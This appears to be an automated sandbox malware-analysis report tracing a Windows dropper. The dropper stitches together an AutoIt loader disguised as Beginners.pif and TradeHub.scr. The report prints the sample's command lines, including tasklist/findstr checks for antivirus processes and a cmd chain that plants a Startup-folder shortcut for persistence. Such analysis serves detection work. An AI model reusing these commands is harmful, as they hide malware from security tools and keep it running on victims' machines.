Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00124830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DD4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00124632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0013D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00114254 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00108F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00115778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr; Code function: 15_2_00DC5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\file.exe; File created: C:\Windows\AdoptionSections
Source: C:\Users\user\Desktop\file.exe; File created: C:\Windows\AdvisorUsb
Source: C:\Users\user\Desktop\file.exe; File created: C:\Windows\ProminentSavings
Source: C:\Users\user\Desktop\file.exe; File created: C:\Windows\ValuablePeninsula
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0040497C
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00406ED2
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000BB020
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000B94E0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000B9C80
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000D23F5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00138400
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000E6502
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000E265E
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000BE6F0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000D282A
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000E89BF
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00130A3A
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000E6A74
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000C0BE0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000DCD51
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_0010EDB2
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00118E44
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_00130EB7
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000E6FE6
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000D33B7
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000DF409
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000CD45D
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000CF628
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000B1663
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000D16B4
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000D78C3
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000D1BA8
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000DDBA5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000E9CE5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000CDD28
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000D1FC0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif; Code function: 10_2_000DBFD6
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D6B02015_2_00D6B020
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D694E015_2_00D694E0
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D69C8015_2_00D69C80
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: String function: 00D71A36 appears 34 times
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: String function: 00D80D17 appears 70 times
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: String function: 00D88B30 appears 42 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: String function: 000C1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: String function: 000D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: String function: 000D8B30 appears 42 times
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal92.expl.evad.winEXE@28/18@2/0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011A6AD GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_00108DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_00109399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DB8DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DB9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_00114148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004024FB CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | File created: C:\Users\user\AppData\Local\TradeOptimize Dynamics
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\nsn1295.tmp
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries (reported twice): IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 16%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 182349
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "RefundAlienConservativeChapters" Coral
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res l
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif Beginners.pif l
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z"
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll (loaded three times), textshaping.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Sections loaded: cmdext.dll, apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Sections loaded (same sequence reported twice): version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe | Sections loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_000D8B75 push ecx; ret 10_2_000D8B88
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_000CCBDB push eax; retf 10_2_000CCBF8
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00D88B75 push ecx; ret 15_2_00D88B88

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | File created (dropped file): C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr
Source: C:\Windows\SysWOW64\cmd.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\182349\Beginners.pif
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_001359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_000C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DE59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00D75EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_000D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress (repeated 36 times)
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX (reported 12 times)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX (reported twice)
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Process information set: NOOPENFILEERRORBOX (reported twice)
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (reported twice)
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Process information set: NOOPENFILEERRORBOX (reported twice)
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_10-100298
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DC4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DC494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DCC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DCCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DCCD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DCF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DCF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DCFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr | Code function: 15_2_00DC3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif | Code function: 10_2_000C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\182349\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\182349
Source: Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: TradeHub.scr, 0000000F.00000002.3506788424.0000000000C73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001245D5 BlockInput,10_2_001245D5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_000C5240
